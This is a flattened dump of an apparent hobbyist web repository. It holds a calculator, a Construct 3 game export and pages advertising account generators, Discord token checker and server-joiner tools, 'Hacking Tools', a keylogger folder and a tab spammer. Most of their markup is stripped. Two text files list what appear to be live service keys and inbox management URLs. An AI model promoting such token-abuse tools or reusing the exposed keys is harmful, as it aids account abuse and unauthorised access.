margin-top: 100px; 58 | margin-bottom: 100px; 59 | margin-right: 100px; 60 | margin-left: 525px; 61 | width: 320px; 62 | padding: 10px; 63 | border: 5px solid green; 64 | } 65 | 66 | div { 67 | font-size: 18px; 68 | color: green; 69 | font-family: Open+Sans; 70 | } 71 | 72 | div.center { 73 | display: block; 74 | margin-left: 600px; 75 | margin-right: 100px; 76 | width: 50%; 77 | } 78 | 79 | 80 | revad { 81 | margin: auto; 82 | font-size: 18px; 83 | color: lightgreen; 84 | text-align: left; 85 | font-family: Open+Sans; 86 | } 87 | 88 | http { 89 | color: darkgreen; 90 | text-align: center; 91 | } 92 | 93 | 94 | s4 { 95 | color: darkgreen; 96 | text-align: left; 97 | } 98 | 99 | 100 | s5 { 101 | color: darkgreen; 102 | text-align: right; 103 | } 104 | -------------------------------------------------------------------------------- /html/PHPToolsOnly.html: -------------------------------------------------------------------------------- 1 |

2 | PHP 3 |

4 | 5 |

6 | 9 | 10 | 30 |

31 | 32 |

33 | Genshin Impact Account Generator 34 |

35 | 36 | Part 1 37 | 43 | 44 | 45 | 46 | 47 |

48 | cpanel email generator 49 |

50 | 51 | Part 1 52 | 58 | 59 | 60 | 61 | 62 |

63 | Scratch Account Generator 64 |

65 | 66 | Part 1 67 | 73 | 74 | 75 | 76 | 77 |

78 | twitter account generator 79 |

80 | 81 | Part 1 82 | 88 | 89 | 90 | 91 | 92 |

93 | Spotify account generator 94 |

95 | 96 | Part 1 97 | 103 | 104 | 105 | 106 | 107 |

108 | WifiID account generator 109 |

110 | 111 | Part 1 112 | 118 | 119 | 120 | Part 2 121 | 127 | 128 | -------------------------------------------------------------------------------- /html/PythonToolsOnly.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | Altify | Python Tools 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 27 |

28 | PYTHON TOOLS 29 |

30 |

31 | 34 | 35 | 54 |

55 |

56 | Discord Token Checker 57 |

58 | 59 | Part 1 60 | 66 | 67 | 68 | Part 2 69 | 75 | 76 | 77 | 78 | 79 |

80 | Discord Token Server Joiner 81 |

82 | 83 | Part 1 84 | 90 | 91 | 92 | Part 2 93 | 99 | 100 | 101 | 102 | 103 |

104 | Discord Account Gen 105 |

106 | 107 | Part 1 108 | 114 | 115 | 116 | 117 | 118 |

119 | Twitch Account Creator 120 |

121 |

credits to https://github.com/CryonicsX

Visit Developer 122 | 123 | Part 1 124 | 130 | 131 | 132 | 133 | 134 |

135 | Hacking Tools 136 |

137 |

credits to https://github.com/CryonicsX

Visit Developer 138 | 139 | Part 1 140 | 146 | 147 | -------------------------------------------------------------------------------- /html/ResponseTest.html: -------------------------------------------------------------------------------- 1 |
3 | 4 | 5 | 6 | 7 | 9 | 11 | 13 | 14 | 15 | 16 | 17 | 36 |

37 |
38 | 39 | 49 | -------------------------------------------------------------------------------- /html/ResponsiveKeyLogger/Example.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/html/ResponsiveKeyLogger/Example.gif -------------------------------------------------------------------------------- /html/ResponsiveKeyLogger/info.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 24 | 25 |
26 |

27 |
28 | 29 |

30 | 31 | 32 | -------------------------------------------------------------------------------- /html/TabSpammer.html: -------------------------------------------------------------------------------- 1 | 2 | 8 | -------------------------------------------------------------------------------- /html/calculator/calc.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | JavaScript Calculator Created By Altify 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 |

Calculator Program in JavaScript

17 |
18 |
19 |

20 | 21 | 22 | 23 | 24 | 25 | 26 |

27 | 28 | 29 | 30 | 31 | 32 |

33 | 34 | 35 | 36 | 37 | 38 |

39 | 40 | 41 | 42 | 43 | 44 | 45 |
46 | 47 |
48 | 49 |
50 |
51 | 52 | 53 | 54 | 55 | -------------------------------------------------------------------------------- /html/calculator/style.css: -------------------------------------------------------------------------------- 1 | h1 { 2 | text-align: center; 3 | padding: 23px; 4 | background-color: skyblue; 5 | color: white; 6 | } 7 | 8 | #clear{ 9 | width: 270px; 10 | border: 3px solid gray; 11 | border-radius: 3px; 12 | padding: 20px; 13 | background-color: red; 14 | } 15 | 16 | .formstyle 17 | { 18 | width: 300px; 19 | height: 530px; 20 | margin: auto; 21 | border: 3px solid skyblue; 22 | border-radius: 5px; 23 | padding: 20px; 24 | } 25 | 26 | 27 | 28 | input 29 | { 30 | width: 20px; 31 | background-color: green; 32 | color: white; 33 | border: 3px solid gray; 34 | border-radius: 5px; 35 | padding: 26px; 36 | margin: 5px; 37 | font-size: 15px; 38 | } 39 | 40 | 41 | #calc{ 42 | width: 250px; 43 | border: 5px solid black; 44 | border-radius: 3px; 45 | padding: 20px; 46 | margin: auto; 47 | } 48 | -------------------------------------------------------------------------------- /html/csrf.js: -------------------------------------------------------------------------------- 1 | /* 2 | // Paste This into your html to use the csrf token generator at no charge whatsoever 3 | // Created by Altify 4 | 5 | 6 | 7 | 8 | */ 9 | setTimeout(randomString, 200); 10 | function randomString(length, chars) { 11 | refcount = Math.floor(Math.random() * 100000) + 1; 12 | var result = ''; 13 | for (var i = length; i > 0; --i) result += chars[Math.floor(Math.random() * chars.length)]; 14 | return result; 15 | } 16 | csrf = randomString(32, '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'); 17 | csrf2 = randomString(32, '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'); 18 | csrf3 = randomString(32, '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'); 19 | document.getElementById("csrfid").innerHTML = (csrf); 20 | document.getElementById("csrfid2").innerHTML = (csrf2); 21 | document.getElementById("csrfid4").innerHTML = ("
"); 22 | -------------------------------------------------------------------------------- /html/games/drop-the-number-game/1.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Drop The Number 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 |
16 | 33 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | -------------------------------------------------------------------------------- /html/games/drop-the-number-game/4.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Drop The Number 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 |
17 | 34 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /html/games/drop-the-number-game/icons/a: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /html/games/drop-the-number-game/icons/icon-128.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/html/games/drop-the-number-game/icons/icon-128.png -------------------------------------------------------------------------------- /html/games/drop-the-number-game/icons/icon-256.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/html/games/drop-the-number-game/icons/icon-256.png -------------------------------------------------------------------------------- /html/games/drop-the-number-game/icons/icon-512.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/html/games/drop-the-number-game/icons/icon-512.png -------------------------------------------------------------------------------- /html/games/drop-the-number-game/icons/loading-logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/html/games/drop-the-number-game/icons/loading-logo.png -------------------------------------------------------------------------------- /html/games/drop-the-number-game/images/a: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /html/games/drop-the-number-game/images/doubleeffect-sheet0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/html/games/drop-the-number-game/images/doubleeffect-sheet0.png -------------------------------------------------------------------------------- /html/games/drop-the-number-game/images/shared-0-sheet0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/html/games/drop-the-number-game/images/shared-0-sheet0.png -------------------------------------------------------------------------------- /html/games/drop-the-number-game/images/shared-0-sheet1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/html/games/drop-the-number-game/images/shared-0-sheet1.png -------------------------------------------------------------------------------- /html/games/drop-the-number-game/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Drop The Number 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 |
17 | 34 | 40 | 41 | 42 | 43 | 44 | 45 | 46 |
47 |

Other Game Modes

48 |

Multiples of 4

4x 49 |

More Numbers

More Numbers 50 |

Only 1

1x 51 |
52 | -------------------------------------------------------------------------------- /html/games/drop-the-number-game/media/a: -------------------------------------------------------------------------------- 1 | a 2 | -------------------------------------------------------------------------------- /html/games/drop-the-number-game/media/drop.webm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/html/games/drop-the-number-game/media/drop.webm -------------------------------------------------------------------------------- /html/games/drop-the-number-game/media/merge.webm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/html/games/drop-the-number-game/media/merge.webm -------------------------------------------------------------------------------- /html/games/drop-the-number-game/more.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Drop The Number 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 |
17 | 34 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /html/games/drop-the-number-game/scripts/a: -------------------------------------------------------------------------------- 1 | a 2 | -------------------------------------------------------------------------------- /html/games/drop-the-number-game/scripts/dispatchworker.js: -------------------------------------------------------------------------------- 1 | 'use strict';self.inputPort=null;self.jobQueue=[];self.jobWorkers=[];self.sentBlobs=[];self.sentBuffers=[];self.importedScripts=[];self.lastBroadcasts=new Map; 2 | class JobWorker{constructor(port,number){this._port=port;this._number=number;this._isReady=false;this._isBusy=false;this._port.onmessage=e=>this._OnMessage(e.data)}ImportScripts(scripts){this._port.postMessage({"type":"_import_scripts","scripts":scripts})}SendBlob(blob,id){this._port.postMessage({"type":"_send_blob","blob":blob,"id":id})}SendBuffer(buffer,id){this._port.postMessage({"type":"_send_buffer","buffer":buffer,"id":id})}SendJob(job){if(this._isBusy||!this._isReady)throw new Error("cannot take job"); 3 | this._isBusy=true;this._port.postMessage(job,job["transferables"])}_InitBroadcast(job){this._port.postMessage(job,job["transferables"])}SendReady(){this._port.postMessage({"type":"_ready"})}IsReady(){return this._isReady}_OnReady(){this._isReady=true;this.MaybeStartNextJob()}IsBusy(){return this._isBusy}GetNumber(){return this._number}_OnMessage(msg){const type=msg["type"];switch(type){case "ready":this._OnReady();return;case "done":this._OnJobDone();return;default:console.error("unknown message from worker '"+ 4 | type+"'");return}}_OnJobDone(){this._isBusy=false;this.MaybeStartNextJob()}MaybeStartNextJob(){if(this._isBusy||!this._isReady)return;const i=this._FindAvailableJob();if(i===-1)return;const job=self.jobQueue[i];const isBroadcast=job["isBroadcast"];if(isBroadcast){job["doneFlags"][this._number]=true;if(job["doneFlags"].every(x=>x))self.jobQueue.splice(i,1)}else self.jobQueue.splice(i,1);this.SendJob(job)}_FindAvailableJob(){for(let i=0,len=self.jobQueue.length;i{const msg=e.data;const type=msg["type"];if(type==="_init"){self.inputPort=msg["in-port"];self.inputPort.onmessage=OnInputPortMessage}else if(type==="_addJobWorker")AddJobWorker(msg["port"])}); 8 | function OnInputPortMessage(e){const msg=e.data;const type=msg["type"];if(type==="_cancel"){CancelJob(msg.jobId);return}else if(type==="_import_scripts"){const scripts=msg["scripts"];for(const w of self.jobWorkers)w.ImportScripts(scripts);self.importedScripts.push(scripts);return}else if(type==="_send_blob"){const blob=msg["blob"];const id=msg["id"];for(const w of self.jobWorkers)w.SendBlob(blob,id);self.sentBlobs.push([blob,id]);return}else if(type==="_send_buffer"){const buffer=msg["buffer"];const id= 9 | msg["id"];for(const w of self.jobWorkers)w.SendBuffer(buffer,id);self.sentBuffers.push([buffer,id]);return}else if(type==="_no_more_workers"){self.sentBlobs.length=0;self.sentBuffers.length=0;self.importedScripts.length=0;self.lastBroadcasts.clear();return}else if(type==="_testMessageChannel"){self.jobWorkers[0].TestMessageChannel();return}self.jobQueue.push(msg);if(msg["isBroadcast"]){msg["doneFlags"]=(new Array(self.jobWorkers.length)).fill(false);msg["transferables"]=[];self.lastBroadcasts.set(msg["type"], 10 | msg)}for(const w of self.jobWorkers)w.MaybeStartNextJob()}; -------------------------------------------------------------------------------- /html/games/drop-the-number-game/scripts/jobworker.js: -------------------------------------------------------------------------------- 1 | 'use strict';self.dispatchPort=null;self.outputPort=null;self.workerNumber=-1;self.activeJobId=null;self.sentBlobs=new Map;self.sentBuffers=new Map;self.JobHandlers={}; 2 | function FlipImageData(data,width,height){const stride=width*4;const tempRow=new Uint8Array(stride);const imageBuffer=data.buffer;for(let topY=0,len=Math.floor(height/2);topY{const msg=e.data;const type=msg["type"];switch(type){case "init":self.workerNumber=msg["number"];self.dispatchPort=msg["dispatch-port"];self.dispatchPort.onmessage=OnDispatchWorkerMessage;self.outputPort=msg["output-port"];return;case "terminate":self.close();return;default:console.error("unknown message '"+type+"'");return}});function SendReady(){self.dispatchPort.postMessage({"type":"ready"});self.outputPort.postMessage({"type":"ready"})} 6 | function SendError(isBroadcast,e){if(!isBroadcast)self.outputPort.postMessage({"type":"error","jobId":self.activeJobId,"error":e.toString()});SendDone()}function SendResult(isBroadcast,ret){if(!isBroadcast){const transferables=ret.transferables||[];self.outputPort.postMessage({"type":"result","jobId":self.activeJobId,"result":ret.result},transferables)}SendDone()}function SendDone(){self.activeJobId=null;self.dispatchPort.postMessage({"type":"done"})} 7 | function SendProgress(val){self.outputPort.postMessage({"type":"progress","jobId":self.activeJobId,"progress":val})} 8 | function OnDispatchWorkerMessage(e){const msg=e.data;const type=msg["type"];if(type==="_import_scripts"){importScripts(...msg["scripts"]);return}else if(type==="_send_blob"){self.sentBlobs.set(msg["id"],msg["blob"]);return}else if(type==="_send_buffer"){self.sentBuffers.set(msg["id"],msg["buffer"]);return}else if(type==="_testMessageChannel"){self.outputPort.postMessage({"type":"_testMessageChannelOk"});return}else if(type==="_ready"){SendReady();return}const jobId=msg["jobId"];const isBroadcast= 9 | msg["isBroadcast"];const params=msg["params"];let ret;self.activeJobId=jobId;if(!self.JobHandlers.hasOwnProperty(type)){console.error(`no handler for message type '${type}'`);return}try{ret=self.JobHandlers[type](params)}catch(e){SendError(isBroadcast,"Exception in job handler: "+e);return}if(ret&&ret.then)ret.then(asyncRet=>SendResult(isBroadcast,asyncRet)).catch(err=>SendError(isBroadcast,"Rejection in job handler: "+err));else SendResult(isBroadcast,ret)}; -------------------------------------------------------------------------------- /html/games/drop-the-number-game/scripts/offlineclient.js: -------------------------------------------------------------------------------- 1 | 'use strict';{class OfflineClient{constructor(){this._broadcastChannel=typeof BroadcastChannel==="undefined"?null:new BroadcastChannel("offline");this._queuedMessages=[];this._onMessageCallback=null;if(this._broadcastChannel)this._broadcastChannel.onmessage=e=>this._OnBroadcastChannelMessage(e)}_OnBroadcastChannelMessage(e){if(this._onMessageCallback){this._onMessageCallback(e);return}this._queuedMessages.push(e)}SetMessageCallback(f){this._onMessageCallback=f;for(let e of this._queuedMessages)this._onMessageCallback(e);this._queuedMessages.length=0}}window.OfflineClientInfo=new OfflineClient}; -------------------------------------------------------------------------------- /html/games/drop-the-number-game/scripts/register-sw.js: -------------------------------------------------------------------------------- 1 | 'use strict';{window.C3_RegisterSW=async function C3_RegisterSW(){if(!navigator.serviceWorker)return;try{const reg=await navigator.serviceWorker.register("sw.js",{scope:"./"});console.info("Registered service worker on "+reg.scope)}catch(err){console.warn("Failed to register service worker: ",err)}}}; -------------------------------------------------------------------------------- /html/games/drop-the-number-game/scripts/supportcheck.js: -------------------------------------------------------------------------------- 1 | 'use strict';(function(){var isKasperskyScriptInjected=!!document.querySelector('script[src*="kaspersky"]');var tmpCanvas=document.createElement("canvas");var hasWebGL=!!tmpCanvas.getContext("webgl");var missingFeatures=[];if(!hasWebGL)missingFeatures.push("WebGL");if(typeof WebAssembly==="undefined")missingFeatures.push("WebAssembly");if(!("noModule"in HTMLScriptElement.prototype))missingFeatures.push("JavaScript Modules");if(missingFeatures.length===0&&!isKasperskyScriptInjected)window["C3_IsSupported"]=true;else{var msgWrap=document.createElement("div");msgWrap.id="notSupportedWrap";document.body.appendChild(msgWrap);var msgTitle=document.createElement("h2");msgTitle.id="notSupportedTitle";if(isKasperskyScriptInjected)msgTitle.textContent="Kaspersky Internet Security broke this export";else msgTitle.textContent="Software update needed";msgWrap.appendChild(msgTitle);var msgBody=document.createElement("p");msgBody.className="notSupportedMessage";var msgText="This content is not supported because your device's software is out-of-date. ";var ua=navigator.userAgent;if(/android/i.test(ua))msgText+='

On Android, fix this by making sure the Android System Webview app has updates enabled and is up-to-date.';else if(/iphone|ipad|ipod/i.test(ua))msgText+="

Note: using the iOS simulator requires Xcode 12+. Otherwise try testing on a real device instead.";else if(/msie/i.test(ua)||/trident/i.test(ua)||/edge\//i.test(ua))msgText+="

Note: Internet Explorer and the legacy Edge browser are not supported. Try using Chrome or Firefox instead.";else if(isKasperskyScriptInjected)msgText="It appears a script was added to this export by Kaspersky software. This prevents the exported project from working. Try disabling Kaspersky and exporting again.";else msgText+="Try installing any available software updates. Alternatively try on a different device.";msgText+="

Missing features: "+missingFeatures.join(", ")+"
User agent: "+navigator.userAgent+"
";msgBody.innerHTML=msgText;msgWrap.appendChild(msgBody)}})(); -------------------------------------------------------------------------------- /html/games/drop-the-number-game/style.css: -------------------------------------------------------------------------------- 1 | html,body{ 2 | padding:0; 3 | margin:0; 4 | overflow:hidden; 5 | background:#1f1f1f; 6 | color:#fff 7 | } 8 | html,body,canvas{ 9 | touch-action:none; 10 | touch-action-delay:none 11 | } 12 | #notSupportedWrap{ 13 | margin:2em auto 1em; 14 | width:75%; 15 | max-width:45em; 16 | border:2px solid #aaa; 17 | border-radius:1em; 18 | padding:2em; 19 | background-color:#f0f0f0; 20 | font-family:segoe ui,Frutiger,frutiger linotype,dejavu sans,helvetica neue,Arial,sans-serif; 21 | color:#000 22 | } 23 | #notSupportedTitle{ 24 | font-size:1.8em 25 | } 26 | .notSupportedMessage{ 27 | font-size:1.2em 28 | } 29 | .notSupportedMessage em{ 30 | color:#888 31 | } 32 | .right { 33 | font-family: segoe ui,Frutiger,frutiger linotype,dejavu sans,helvetica neue,Arial,sans-serif; 34 | color: #ffebeb111; 35 | float: right; 36 | width: 300px; 37 | padding: 10px; 38 | } 39 | .bold { 40 | font-weight: bold; 41 | font-size: 24px 42 | } 43 | -------------------------------------------------------------------------------- /html/games/drop-the-number-game/sw.js: -------------------------------------------------------------------------------- 1 | 'use strict';const OFFLINE_DATA_FILE="offline.json";const CACHE_NAME_PREFIX="c3offline";const BROADCASTCHANNEL_NAME="offline";const CONSOLE_PREFIX="[SW] ";const LAZYLOAD_KEYNAME="";const broadcastChannel=typeof BroadcastChannel==="undefined"?null:new BroadcastChannel(BROADCASTCHANNEL_NAME);function PostBroadcastMessage(o){if(!broadcastChannel)return;setTimeout(()=>broadcastChannel.postMessage(o),3E3)}function Broadcast(type){PostBroadcastMessage({"type":type})} 2 | function BroadcastDownloadingUpdate(version){PostBroadcastMessage({"type":"downloading-update","version":version})}function BroadcastUpdateReady(version){PostBroadcastMessage({"type":"update-ready","version":version})}function IsUrlInLazyLoadList(url,lazyLoadList){if(!lazyLoadList)return false;try{for(const lazyLoadRegex of lazyLoadList)if((new RegExp(lazyLoadRegex)).test(url))return true}catch(err){console.error(CONSOLE_PREFIX+"Error matching in lazy-load list: ",err)}return false} 3 | function WriteLazyLoadListToStorage(lazyLoadList){if(typeof localforage==="undefined")return Promise.resolve();else return localforage.setItem(LAZYLOAD_KEYNAME,lazyLoadList)}function ReadLazyLoadListFromStorage(){if(typeof localforage==="undefined")return Promise.resolve([]);else return localforage.getItem(LAZYLOAD_KEYNAME)}function GetCacheBaseName(){return CACHE_NAME_PREFIX+"-"+self.registration.scope}function GetCacheVersionName(version){return GetCacheBaseName()+"-v"+version} 4 | async function GetAvailableCacheNames(){const cacheNames=await caches.keys();const cacheBaseName=GetCacheBaseName();return cacheNames.filter(n=>n.startsWith(cacheBaseName))}async function IsUpdatePending(){const availableCacheNames=await GetAvailableCacheNames();return availableCacheNames.length>=2} 5 | async function GetMainPageUrl(){const allClients=await clients.matchAll({includeUncontrolled:true,type:"window"});for(const c of allClients){let url=c.url;if(url.startsWith(self.registration.scope))url=url.substring(self.registration.scope.length);if(url&&url!=="/"){if(url.startsWith("?"))url="/"+url;return url}}return""} 6 | function fetchWithBypass(request,bypassCache){if(typeof request==="string")request=new Request(request);if(bypassCache)return fetch(request.url,{headers:request.headers,mode:request.mode,credentials:request.credentials,redirect:request.redirect,cache:"no-store"});else return fetch(request)} 7 | async function CreateCacheFromFileList(cacheName,fileList,bypassCache){const responses=await Promise.all(fileList.map(url=>fetchWithBypass(url,bypassCache)));let allOk=true;for(const response of responses)if(!response.ok){allOk=false;console.error(CONSOLE_PREFIX+"Error fetching '"+response.url+"' ("+response.status+" "+response.statusText+")")}if(!allOk)throw new Error("not all resources were fetched successfully");const cache=await caches.open(cacheName);try{return await Promise.all(responses.map((response, 8 | i)=>cache.put(fileList[i],response)))}catch(err){console.error(CONSOLE_PREFIX+"Error writing cache entries: ",err);caches.delete(cacheName);throw err;}} 9 | async function UpdateCheck(isFirst){try{const response=await fetchWithBypass(OFFLINE_DATA_FILE,true);if(!response.ok)throw new Error(OFFLINE_DATA_FILE+" responded with "+response.status+" "+response.statusText);const data=await response.json();const version=data.version;const fileList=data.fileList;const lazyLoadList=data.lazyLoad;const currentCacheName=GetCacheVersionName(version);const cacheExists=await caches.has(currentCacheName);if(cacheExists){const isUpdatePending=await IsUpdatePending();if(isUpdatePending){console.log(CONSOLE_PREFIX+ 10 | "Update pending");Broadcast("update-pending")}else{console.log(CONSOLE_PREFIX+"Up to date");Broadcast("up-to-date")}return}const mainPageUrl=await GetMainPageUrl();fileList.unshift("./");if(mainPageUrl&&fileList.indexOf(mainPageUrl)===-1)fileList.unshift(mainPageUrl);console.log(CONSOLE_PREFIX+"Caching "+fileList.length+" files for offline use");if(isFirst)Broadcast("downloading");else BroadcastDownloadingUpdate(version);if(lazyLoadList)await WriteLazyLoadListToStorage(lazyLoadList);await CreateCacheFromFileList(currentCacheName, 11 | fileList,!isFirst);const isUpdatePending=await IsUpdatePending();if(isUpdatePending){console.log(CONSOLE_PREFIX+"All resources saved, update ready");BroadcastUpdateReady(version)}else{console.log(CONSOLE_PREFIX+"All resources saved, offline support ready");Broadcast("offline-ready")}}catch(err){console.warn(CONSOLE_PREFIX+"Update check failed: ",err)}}self.addEventListener("install",event=>{event.waitUntil(UpdateCheck(true).catch(()=>null))}); 12 | async function GetCacheNameToUse(availableCacheNames,doUpdateCheck){if(availableCacheNames.length===1||!doUpdateCheck)return availableCacheNames[0];const allClients=await clients.matchAll();if(allClients.length>1)return availableCacheNames[0];const latestCacheName=availableCacheNames[availableCacheNames.length-1];console.log(CONSOLE_PREFIX+"Updating to new version");await Promise.all(availableCacheNames.slice(0,-1).map(c=>caches.delete(c)));return latestCacheName} 13 | async function HandleFetch(event,doUpdateCheck){const availableCacheNames=await GetAvailableCacheNames();if(!availableCacheNames.length)return fetch(event.request);const useCacheName=await GetCacheNameToUse(availableCacheNames,doUpdateCheck);const cache=await caches.open(useCacheName);const cachedResponse=await cache.match(event.request);if(cachedResponse)return cachedResponse;const result=await Promise.all([fetch(event.request),ReadLazyLoadListFromStorage()]);const fetchResponse=result[0];const lazyLoadList= 14 | result[1];if(IsUrlInLazyLoadList(event.request.url,lazyLoadList))try{await cache.put(event.request,fetchResponse.clone())}catch(err){console.warn(CONSOLE_PREFIX+"Error caching '"+event.request.url+"': ",err)}return fetchResponse} 15 | self.addEventListener("fetch",event=>{if((new URL(event.request.url)).origin!==location.origin)return;const doUpdateCheck=event.request.mode==="navigate";const responsePromise=HandleFetch(event,doUpdateCheck);if(doUpdateCheck)event.waitUntil(responsePromise.then(()=>UpdateCheck(false)));event.respondWith(responsePromise)}); 16 | -------------------------------------------------------------------------------- /html/games/drop-the-number-game/workermain.js: -------------------------------------------------------------------------------- 1 | 'use strict';let hasInitialised=false;let runtime=null;self.addEventListener("message",e=>{const data=e.data;const type=data["type"];if(type==="init-runtime")InitRuntime(data);else throw new Error(`unknown message '${type}'`);});self.c3_import=url=>import(url);function IsAbsoluteURL(url){return/^(?:[a-z\-]+:)?\/\//.test(url)||url.substr(0,5)==="data:"||url.substr(0,5)==="blob:"}function IsRelativeURL(url){return!IsAbsoluteURL(url)} 2 | async function LoadScripts(scriptsArr){if(scriptsArr.length===1){const url=scriptsArr[0];await import(((IsRelativeURL(url)?"./":"")+url))}else{const scriptStr=scriptsArr.map(url=>`import "${IsRelativeURL(url)?"./":""}${url}";`).join("\n");const blobUrl=URL.createObjectURL(new Blob([scriptStr],{type:"application/javascript"}));await import(blobUrl)}} 3 | async function InitRuntime(data){if(hasInitialised)throw new Error("already initialised");hasInitialised=true;const messagePort=data["messagePort"];const baseUrl=data["baseUrl"];const exportType=data["exportType"];self.devicePixelRatio=data["devicePixelRatio"];const workerDependencyScripts=data["workerDependencyScripts"].map(urlOrBlob=>{let url=urlOrBlob;if(urlOrBlob instanceof Blob)url=URL.createObjectURL(urlOrBlob);else url=(new URL(url,baseUrl)).toString();return url});const runOnStartupFunctions= 4 | [];self.runOnStartup=function runOnStartup(f){if(typeof f!=="function")throw new Error("runOnStartup called without a function");runOnStartupFunctions.push(f)};const engineScripts=data["engineScripts"].map(url=>(new URL(url,baseUrl)).toString());try{await LoadScripts([...workerDependencyScripts,...engineScripts])}catch(err){console.error("[C3 runtime] Failed to load all engine scripts in worker: ",err);return}const scriptsStatus=data["projectScriptsStatus"];self["C3_ProjectScriptsStatus"]=scriptsStatus; 5 | const mainProjectScript=data["mainProjectScript"];const allProjectScripts=data["projectScripts"];for(let [originalUrl,loadUrl]of allProjectScripts){if(!loadUrl)loadUrl=originalUrl;if(originalUrl===mainProjectScript)try{await LoadScripts([loadUrl]);if(exportType==="preview"&&!scriptsStatus[originalUrl])ReportProjectMainScriptError(originalUrl,"main script did not run to completion",messagePort)}catch(err){ReportProjectMainScriptError(originalUrl,err,messagePort)}else if(originalUrl==="scriptsInEvents.js"|| 6 | originalUrl.endsWith("/scriptsInEvents.js"))await LoadScripts([loadUrl])}data["runOnStartupFunctions"]=runOnStartupFunctions;if(exportType==="preview"&&typeof self.C3.ScriptsInEvents!=="object"){const msg="Failed to load JavaScript code used in events. Check all your JavaScript code has valid syntax.";console.error("[C3 runtime] "+msg);messagePort.postMessage({"type":"alert-error","message":msg});return}messagePort.postMessage({"type":"creating-runtime"});runtime=self["C3_CreateRuntime"](data);await self["C3_InitRuntime"](runtime, 7 | data)}function ReportProjectMainScriptError(url,err,messagePort){console.error(`[Preview] Failed to load project main script (${url}): `,err);const msg=`Failed to load project main script (${url}). Check all your JavaScript code has valid syntax. Press F12 and check the console for error details.`;messagePort.postMessage({"type":"alert-error","message":msg})}; 8 | -------------------------------------------------------------------------------- /html/log.html: -------------------------------------------------------------------------------- 1 | 2 | 3 |

4 |

5 | 13 |

14 |
15 |         
16 |         
17 |             
18 |         
19 |         
20 |         
21 |         
22 |
23 |
24 |
25 | 26 | 27 | 30 |

31 |

the "/" is a illegal input so dont use it

32 | 33 |
34 | -------------------------------------------------------------------------------- /html/postmailinboxes.txt: -------------------------------------------------------------------------------- 1 | https://postmail.invotes.com/accounts/manage/31dbe5b1-1666-45e2-ba08-baf732e9d41f 2 | https://postmail.invotes.com/accounts/manage/311c70f7-a996-4c23-a678-ca46ee3dd7f7 3 | https://postmail.invotes.com/accounts/manage/2623adee-04af-4cc0-b236-ee607acfbbf8 4 | https://postmail.invotes.com/accounts/manage/016383f4-be61-4bf3-abd1-2f8974fb6696 5 | https://postmail.invotes.com/accounts/manage/9bfcef6d-c5fb-4c32-92b9-97fca46f03ea 6 | https://postmail.invotes.com/accounts/manage/4958d27a-1f1b-46a1-9d86-a452ff9f4c31 7 | https://postmail.invotes.com/accounts/manage/5ebeae2e-ad56-490f-b3ea-5987c5fefede 8 | https://postmail.invotes.com/accounts/manage/ca96c007-f646-440b-8641-f48dd858f70b 9 | https://postmail.invotes.com/accounts/manage/ddbf326f-7886-415f-9e23-b1c30ba2432b 10 | https://postmail.invotes.com/accounts/manage/5dbe3021-47a8-4eca-9528-0828c989cb67 11 | -------------------------------------------------------------------------------- /html/postmailkeys.txt: -------------------------------------------------------------------------------- 1 | 2gu0dq5omuubwh8fgmy6t5u2 2 | wq0gv1ohrccy5ttyd85qj11p 3 | r9559nxyjv5u6tdbnbl6pao9 4 | t04ozsbbdlm8rois527hcz04 5 | vd6oupjsi3bcx1ib6romwm89 6 | u3s8ex7cczegw5965n3fkqhg 7 | wub4jn4fuuz88xovtpu5e0ot 8 | sba5119y8m39l0eoy41px5s1 9 | hm40dlqlcsm94z6i28lyulyj 10 | 